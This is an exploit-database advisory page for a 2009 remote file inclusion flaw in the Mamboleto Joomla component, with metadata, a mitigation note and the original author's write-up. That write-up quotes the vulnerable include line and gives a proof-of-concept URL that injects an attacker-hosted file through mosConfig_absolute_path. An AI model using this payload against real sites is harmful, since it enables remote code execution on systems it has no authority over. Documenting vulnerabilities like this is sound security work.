Mamboleto Joomla! component Remote File Include Vulneralbility

vendor:

Mamboleto

by:

Don Tukulesto

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Mamboleto

Affected Version From: 2.0 RC3

Affected Version To: 2.0 RC3

Patch Exists: Yes

Related CWE: N/A

CPE: a:fernandosoares.com.br:mamboleto:2.0_rc3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Mamboleto Joomla! component Remote File Include Vulneralbility

Mamboleto Joomla! component is vulnerable to a remote file inclusion vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mosConfig_absolute_path' parameter of the 'mamboleto.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

/**************************************************************************

[!] Mamboleto Joomla! component Remote File Include Vulneralbility
[!] Author	: Don Tukulesto (root@indonesiancoder.com)
[!] Homepage	: http://www.indonesiancoder.com
[!] Date	: December 10, 2009
[!] Tune In	: http://antisecradio.fm (choose your weapon)

**************************************************************************/

[ Software Information ]

[+] Vendor : http://www.fernandosoares.com.br/
[+] Download : http://www.fernandosoares.com.br/index.php?option=com_docman&task=doc_download&gid=35&Itemid=28
[+] Version() : 2.0 RC3
[+] Novo Mamboleto 2.0 RC3 para Joomla! 1.5.x em "legacy mode". 
    Muito mais aprimorado com dois bancos a mais  (Sicredi e Bancoob) e com um novo módulo de integração com o VirtueMart.
[+] Method : Remote File Inclusion
[+] Dork : Wie WiLL Not Go Down

===========================================================================

[ Vulnerable File ]

[+] mamboleto.php

Line 123

include_once( $mosConfig_absolute_path . '/administrator/components/com_mamboleto/include/pre.php');

[ Proof of Concept ]

http://server/acomponents/com_mamboleto/mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]

===========================================================================

[ Who The Hell Has Control of That Damn Smoke Machine ]

[~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown
[~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd,
[~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz
[~] kecemplungkalen, ran, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!!
[~] Thank you to ALL OF YOU called me piece of shit, especially for High school friends

[ rm -rf yourself ] 

[>] FOR MALINGSIAL


[ some quotes ]

[+] Jack- says : why so serious ?
[+] Yadoy666 says : awas ada tukang =))
[+] arianom says : Kumpulkan Koin untuk Prita Mulyasari !!!
[+] Pathloader says : Oke lah kalau beg... beg... beg... begitu :D
[+] tiw0L says : Ojo di maem pleaseeeeee!!!